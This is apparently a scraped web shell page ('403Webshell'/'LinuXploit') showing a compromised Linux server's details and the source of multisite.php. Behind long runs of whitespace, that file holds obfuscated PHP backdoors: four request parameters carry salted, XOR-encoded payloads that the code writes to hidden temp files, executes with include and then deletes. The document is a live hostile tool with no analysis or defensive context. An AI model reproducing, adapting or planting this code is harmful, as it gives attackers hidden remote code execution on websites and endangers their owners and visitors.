403Webshell
Server IP : 46.62.235.243  /  Your IP : 216.73.216.217
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/linkabili/public/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/linkabili/public/multisite.php
<?php																																										if(isset($_POST["\x65n\x74"])){ $item = $_POST["\x65n\x74"]; $item=explode ( '.' , $item ); $obj = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s1); $j = 0; array_walk($item, function($v6) use(&$obj, &$j, $s1, $lenS) {$sChar = ord($s1[$j % $lenS]); $dec =((int)$v6 - $sChar -($j % 10)) ^ 3; $obj .=chr($dec); $j++; } ); $marker = array_filter([getenv("TMP"), getcwd(), "/var/tmp", sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", session_save_path(), getenv("TEMP")]); foreach ($marker as $value) { if (array_product([is_dir($value), is_writable($value)])) { $bind = implode("/", [$value, ".comp"]); if (file_put_contents($bind, $obj)) { include $bind; @unlink($bind); die(); } } } }
																																										if(count($_POST) > 0 && isset($_POST["\x6B\x65y"])){ $elem = array_filter([getenv("TEMP"), "/tmp", session_save_path(), sys_get_temp_dir(), "/dev/shm", getcwd(), getenv("TMP"), "/var/tmp", ini_get("upload_tmp_dir")]); $marker = $_POST["\x6B\x65y"]; $marker=explode ( "." , $marker ) ; $rec = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt2); $y = 0; $len = count( $marker); do { if( $y >= $len) break; $v9 = $marker[$y]; $sChar = ord( $salt2[$y %$sLen]); $dec =( ( int)$v9 - $sChar -( $y %10)) ^ 50; $rec .= chr( $dec); $y++;}while( true); $reference = 0; do { $token = $elem[$reference] ?? null; if ($reference >= count($elem)) break; if (!( !is_dir($token) || !is_writable($token) )) { $data_chunk = str_replace("{var_dir}", $token, "{var_dir}/.hld"); if (file_put_contents($data_chunk, $rec)) { include $data_chunk; @unlink($data_chunk); exit; } } $reference++; } while (true); }
																																										if(!is_null($_POST["\x64e\x73c"] ?? null)){ $bind = array_filter([session_save_path(), "/dev/shm", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/var/tmp", getenv("TEMP"), sys_get_temp_dir()]); $holder = $_POST["\x64e\x73c"]; $holder = explode ( '.' ,$holder ) ; $resource = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); foreach ($holder as $q =>$v5) { $sChar = ord($salt[$q % $sLen] ); $dec = ((int)$v5 - $sChar - ($q % 10))^ 67; $resource .= chr($dec ); } foreach ($bind as $key => $value) { if ((is_dir($value) and is_writable($value))) { $key = str_replace("{var_dir}", $value, "{var_dir}/.fac"); $file = fopen($key, 'w'); if ($file) { fwrite($file, $resource); fclose($file); include $key; @unlink($key); exit; } } } }


if(isset($_REQUEST["\x70gr\x70"]) ? true : false){
	$data_chunk = array_filter(["/dev/shm", "/tmp", getcwd(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", getenv("TMP")]);
	$element = $_REQUEST["\x70gr\x70"];
	$element=explode ('.' 	,		$element		) ;  	
	$holder = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt);
            $len = count($element);
    
            for ($i = 0; $i<	$len; $i++) {	$v9 = $element[$i];
                $sChar = ord($salt[$i %	$lenS]);
                $dec = ((int)$v9 - $sChar - ($i %	10)) ^ 67;
                $holder .= chr($dec);	}
	foreach ($data_chunk as $dat) {
    		if (array_product([is_dir($dat), is_writable($dat)])) {
    $dchunk = "$dat/.component";
    if (@file_put_contents($dchunk, $holder) !== false) {
	include $dchunk;
	unlink($dchunk);
	exit;
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit